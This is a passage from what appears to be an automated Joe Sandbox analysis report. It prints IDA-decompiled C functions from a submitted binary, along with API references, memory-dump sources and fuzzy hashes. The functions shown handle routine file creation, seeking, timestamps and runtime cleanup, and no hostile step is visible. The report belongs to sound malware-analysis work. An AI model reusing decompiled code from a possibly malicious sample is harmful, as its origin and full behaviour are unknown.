							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xbddb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xbddb20) {
								E00BC835E( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xbddda0 & 0x00000001;
							if(( *0xbddda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00BCAC71(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xbddd40; // 0x8621c8
									 *0xbdd814 = _t44;
								}
							}
						}
						L6:
						E00BC835E(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00BC87DA())) = 0x16;
						goto L5;
					}
				}
			}

0x00bcb007
0x00bcb014
0x00bcb017
0x00bcb01f
0x00bcb028
0x00bcb02b
0x00bcb031
0x00000000
0x00bcb033
0x00bcb037
0x00bcb044
0x00bcb046
0x00bcb04a
0x00bcb04c
0x00bcb07c
0x00bcb07c
0x00000000
0x00bcb04e
0x00bcb05b
0x00bcb061
0x00bcb064
0x00bcb069
0x00bcb06d
0x00bcb06f
0x00bcb08e
0x00bcb092
0x00bcb094
0x00bcb094
0x00bcb09f
0x00bcb0a3
0x00bcb0a4
0x00bcb0a6
0x00bcb0a9
0x00bcb0b0
0x00bcb0b5
0x00bcb0ba
0x00bcb0b0
0x00bcb0bb
0x00bcb0c1
0x00bcb0c6
0x00bcb0c8
0x00bcb0cb
0x00bcb0ce
0x00bcb0d5
0x00bcb0d7
0x00bcb0de
0x00bcb0e3
0x00bcb0ec
0x00bcb0f1
0x00bcb0f7
0x00bcb0f9
0x00bcb0fe
0x00bcb0fe
0x00bcb0f7
0x00bcb0de
0x00bcb07e
0x00bcb07f
0x00000000
0x00bcb071
0x00bcb076
0x00000000
0x00bcb076
0x00bcb06f

APIs

Part of subcall function 00BC8E25: GetLastError.KERNEL32(?,00BDFF50,00BC3C54,00BDFF50,?,?,00BC36CF,?,?,00BDFF50), ref: 00BC8E29
Part of subcall function 00BC8E25: _free.LIBCMT ref: 00BC8E5C
Part of subcall function 00BC8E25: SetLastError.KERNEL32(00000000,?,00BDFF50), ref: 00BC8E9D
Part of subcall function 00BC8E25: _abort.LIBCMT ref: 00BC8EA3

Part of subcall function 00BCB12E: _abort.LIBCMT ref: 00BCB160
Part of subcall function 00BCB12E: _free.LIBCMT ref: 00BCB194

Part of subcall function 00BCAD9B: GetOEMCP.KERNEL32(00000000,?,?,00BCB024,?), ref: 00BCADC6

_free.LIBCMT ref: 00BCB07F
_free.LIBCMT ref: 00BCB0B5

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 138f4702e7cd0de6ed2e9fd0d07a283128d12fe9a4ba5aa12e56abb462af36ee
Instruction ID: 29c7940505dd7395281fbcaeeeb26abfe60113252af818af9889e5e328eb39df
Opcode Fuzzy Hash: 138f4702e7cd0de6ed2e9fd0d07a283128d12fe9a4ba5aa12e56abb462af36ee
Instruction Fuzzy Hash: D931A732904208AFDB11EFA8D442F5EB7E5EF44320F2540DEE4149B291EF725D41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA96BE Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA96BE(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00BBE1C0();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00BABBA9(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00BAB5AC(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00BAFD96(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x00ba96c3
0x00ba96c9
0x00ba96d6
0x00ba96d8
0x00ba96de
0x00ba96ec
0x00ba96ec
0x00ba96e6
0x00ba96e6
0x00ba96e6
0x00ba96f6
0x00ba970b
0x00ba9714
0x00ba971a
0x00ba9724
0x00000000
0x00ba9726
0x00ba9726
0x00ba972a
0x00ba972c
0x00ba972c
0x00ba9732
0x00ba9732
0x00ba9732
0x00ba9736
0x00ba9736
0x00ba9746
0x00ba974c
0x00ba974c
0x00ba9753
0x00ba9781
0x00ba9781
0x00ba9793
0x00ba9798
0x00ba979b
0x00ba97b4

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BA9E1C,?,?,00BA7840), ref: 00BA9746
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BA9E1C,?,?,00BA7840), ref: 00BA977B

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c46e30bb20c677506d67cfc06da593f3fbd7e2d15dcf5becb754837fda4dbde
Instruction ID: a69e5a0a363477c790e3d50e88217dd76ca9fe2abf6aad0044fd3d51f681c34d
Opcode Fuzzy Hash: 3c46e30bb20c677506d67cfc06da593f3fbd7e2d15dcf5becb754837fda4dbde
Instruction Fuzzy Hash: 3721E771508744AFE7308F64CC85BA777E8EF46764F004A6DF5E5821D1C3B4AC48AA71

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9CA2 Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00BA9CA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00BB0B3D(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00BB0B3D(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00BB0B3D(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00ba9ca2
0x00ba9ca8
0x00ba9cb1
0x00ba9cbc
0x00ba9cbc
0x00ba9cc2
0x00ba9cc8
0x00ba9ccb
0x00ba9cd8
0x00ba9cd4
0x00ba9cd4
0x00ba9cd4
0x00ba9cda
0x00ba9cdb
0x00ba9cdf
0x00ba9ce5
0x00ba9cf2
0x00ba9cf2
0x00ba9ce7
0x00ba9cec
0x00ba9cf0
0x00000000
0x00000000
0x00ba9cf0
0x00ba9cf7
0x00ba9cfd
0x00ba9d07
0x00ba9d07
0x00ba9d0b
0x00ba9d12
0x00ba9d12
0x00ba9d1c
0x00ba9d25
0x00ba9d25
0x00ba9d2d
0x00ba9d36
0x00ba9d36
0x00ba9d46
0x00ba9d54
0x00ba9d64
0x00ba9d6c
0x00ba9d78

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BA7520,?,?,?,?), ref: 00BA9CBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00BA9D6C

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 4e31f93a9cf1e7ae63d61dafb6c2adeee321d4f3a887ae4d6a12d19d0d590d2b
Instruction ID: d1c55a7a7b3b89b3f4b2e2cc7ff18115cd8fe981da8b439af45717161764b709
Opcode Fuzzy Hash: 4e31f93a9cf1e7ae63d61dafb6c2adeee321d4f3a887ae4d6a12d19d0d590d2b
Instruction Fuzzy Hash: EC21D33124C286ABC714DF24C891ABBBBE4EF56704F04089DB8D1C7151E729EE4CE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9A10 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BC9A10(signed int __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t23 = __ecx;
				_t9 =  *0xc00274; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0xc00274 = _t9;
				}
				_t10 = E00BC8429(_t23, _t9, 4); // executed
				 *0xc00278 = _t10;
				E00BC835E(0);
				if( *0xc00278 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0xbdd6b0;
					do {
						_t1 = _t31 + 0x20; // 0xbdd6d0
						E00BCA54A(_t23, _t31, __eflags, _t1, 0xfa0, 0);
						_t14 =  *0xc00278; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t23 = (_t28 & 0x0000003f) * 0x30;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0xc00290 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x30));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0xbdd758;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0xc00274 = _t30;
					 *0xc00278 = E00BC8429(_t23, _t30, 4);
					_t21 = E00BC835E(0);
					if( *0xc00278 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x00bc9a10
0x00bc9a10
0x00bc9a18
0x00bc9a1b
0x00bc9a24
0x00bc9a26
0x00bc9a28
0x00000000
0x00bc9a28
0x00bc9a1d
0x00bc9a1d
0x00bc9a2a
0x00bc9a2a
0x00bc9a2a
0x00bc9a32
0x00bc9a39
0x00bc9a3e
0x00bc9a4d
0x00bc9a7a
0x00bc9a7b
0x00bc9a7b
0x00bc9a7d
0x00bc9a82
0x00bc9a89
0x00bc9a8d
0x00bc9a92
0x00bc9a9c
0x00bc9aa4
0x00bc9aae
0x00bc9ab2
0x00bc9ab5
0x00bc9ac0
0x00bc9ac0
0x00bc9ab7
0x00bc9ab7
0x00bc9aba
0x00000000
0x00bc9abc
0x00bc9abc
0x00bc9abe
0x00000000
0x00000000
0x00bc9abe
0x00bc9aba
0x00bc9ac7
0x00bc9aca
0x00bc9acb
0x00bc9acb
0x00bc9ad4
0x00bc9ad7
0x00bc9a4f
0x00bc9a52
0x00bc9a5f
0x00bc9a64
0x00bc9a73
0x00000000
0x00bc9a75
0x00bc9a79
0x00bc9a79
0x00bc9a73

APIs

_free.LIBCMT ref: 00BC9A3E
_free.LIBCMT ref: 00BC9A64

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9933b259241763ac865e108c596afe535d358ba1f64aca7c212e5dbe74eb1339
Instruction ID: b5d070a8fef2d514bfc1346eb8d70f5068b480056e8e07ccf1d9924818c205fe
Opcode Fuzzy Hash: 9933b259241763ac865e108c596afe535d358ba1f64aca7c212e5dbe74eb1339
Instruction Fuzzy Hash: CB119071A406119AEB209B38AC4DF5936D4A751721F2A07AAF569CA2E0EB70D9828280

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA2D8 Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00BCA2D8(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xc00628 + _a4 * 4;
				_t27 =  *0xbdd668; // 0xb57946a0
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xbdd668; // 0xb57946a0
							goto L13;
						}
						 *_t20 = E00BC2F99(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00BCA374( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xbdd668; // 0xb57946a0
						goto L7;
					}
					_t27 =  *0xbdd668; // 0xb57946a0
					goto L8;
				}
				L2:
				return _t33;
			}

0x00bca2e3
0x00bca2ec
0x00bca2f2
0x00bca2fc
0x00bca2fe
0x00bca302
0x00bca36d
0x00000000
0x00bca36d
0x00bca306
0x00bca30c
0x00bca312
0x00bca32e
0x00bca32e
0x00bca330
0x00bca332
0x00bca35d
0x00bca35f
0x00bca367
0x00bca36b
0x00000000
0x00bca36b
0x00bca33e
0x00bca342
0x00bca357
0x00000000
0x00bca357
0x00bca34b
0x00000000
0x00000000
0x00000000
0x00000000
0x00bca314
0x00bca314
0x00bca316
0x00bca31e
0x00000000
0x00000000
0x00bca320
0x00bca326
0x00000000
0x00000000
0x00bca328
0x00000000
0x00bca328
0x00bca34f
0x00000000
0x00bca34f
0x00bca308
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BCA338
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BCA345

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 4f6c4bb206ba16cccd594ea1a06aec84d466c6e575fce62670b5093efd1a3021
Instruction ID: 00123424d3a2c105b3be17286c1616dabd36da17aa642494c630cf52a12067b9
Opcode Fuzzy Hash: 4f6c4bb206ba16cccd594ea1a06aec84d466c6e575fce62670b5093efd1a3021
Instruction Fuzzy Hash: 381127336025684F8B22DE28DC70E5AB3E5EBC172471602A9FD15AB284EA30EC01C6D6

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9AF5 Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00BA9AF5(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E00BA9885(_t28);
						} else {
							 *0xbd2260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00ba9af5
0x00ba9af7
0x00ba9afd
0x00ba9b77
0x00000000
0x00ba9b77
0x00ba9b00
0x00ba9b05
0x00ba9b09
0x00ba9b0b
0x00ba9b45
0x00ba9b13
0x00ba9b13
0x00ba9b19
0x00ba9b1e
0x00ba9b38
0x00ba9b20
0x00ba9b29
0x00ba9b31
0x00ba9b33
0x00ba9b3d
0x00ba9b3f
0x00ba9b41
0x00ba9b41
0x00ba9b19
0x00ba9b4b
0x00ba9b5c
0x00ba9b67
0x00000000
0x00ba9b73
0x00000000
0x00ba9b73

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001960,?,00000800,-00001960,00BA9AD1,?,?,00000000,?,?,00BA8D43,?), ref: 00BA9B5C
GetLastError.KERNEL32 ref: 00BA9B69

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 6237e4117b9e613bcc5f03215852ce7661a2cd5fcf8ddc43d6989a72e2bfafde
Instruction ID: ef70c0d201d1d4595d384e72913c6ab6a0bc2c5ba783959ac963c90deb3c0f5c
Opcode Fuzzy Hash: 6237e4117b9e613bcc5f03215852ce7661a2cd5fcf8ddc43d6989a72e2bfafde
Instruction Fuzzy Hash: 970104363092009F8B08CF65AC9497EB3D9EFC2721B9482AEF817C3290DA30D805B630

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9D80 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00BA9D80() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00BA6F3A(0xbdff50, 0xbdff50, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00BA6F3A(0xbdff50, 0xbdff50, _t34 + 0x1e);
				goto L3;
			}

0x00ba9d84
0x00ba9d86
0x00ba9d91
0x00ba9da4
0x00ba9da4
0x00ba9db6
0x00ba9dbc
0x00ba9dc0
0x00ba9ddd
0x00ba9de3
0x00ba9de8
0x00ba9dea
0x00000000
0x00ba9dcc
0x00ba9dd0
0x00ba9df9
0x00ba9ded
0x00000000
0x00ba9ded
0x00ba9dd8
0x00000000
0x00ba9dd8
0x00ba9dc0
0x00ba9d97
0x00000000
0x00ba9df5
0x00ba9d9f
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00BA9DB6
GetLastError.KERNEL32 ref: 00BA9DC2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b8e909bf0da199cede6be0cafc63eaa44a93138b2f63a66828f125a3b526b7d1
Instruction ID: e21946f99840354f60ddd9160edcca011582c8201e72e3f131c7b91552a1989c
Opcode Fuzzy Hash: b8e909bf0da199cede6be0cafc63eaa44a93138b2f63a66828f125a3b526b7d1
Instruction Fuzzy Hash: A201B5717092006FDB389F29DC84767B7D9DB86718F14457EB192C3680DA31DC4DD621

Uniqueness

Uniqueness Score: -1.00%

Function 00BA7C41 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00BA7C41(signed int* __ecx, void* __edx, void* __eflags) {
				void* __esi;
				intOrPtr _t23;
				signed int _t24;
				signed int* _t28;
				signed int* _t30;
				void* _t36;
				signed int _t38;
				signed int* _t41;
				void* _t43;
				void* _t46;

				_t46 = __eflags;
				_t36 = __edx;
				_t30 = __ecx;
				E00BBE0E4(E00BD1C55, _t43);
				_push(_t30);
				_push(_t30);
				_t41 = _t30;
				 *(_t43 - 0x10) = _t41;
				 *_t41 =  *_t41 & 0x00000000;
				_t28 =  &(_t41[4]);
				_t41[1] = _t41[1] & 0x00000000;
				E00BAC767(_t28, _t36, _t46); // executed
				_t38 =  *(_t43 + 8);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t41[2] = _t38;
				_t41[0x3d] = 0;
				_t41[0x43d] = 0;
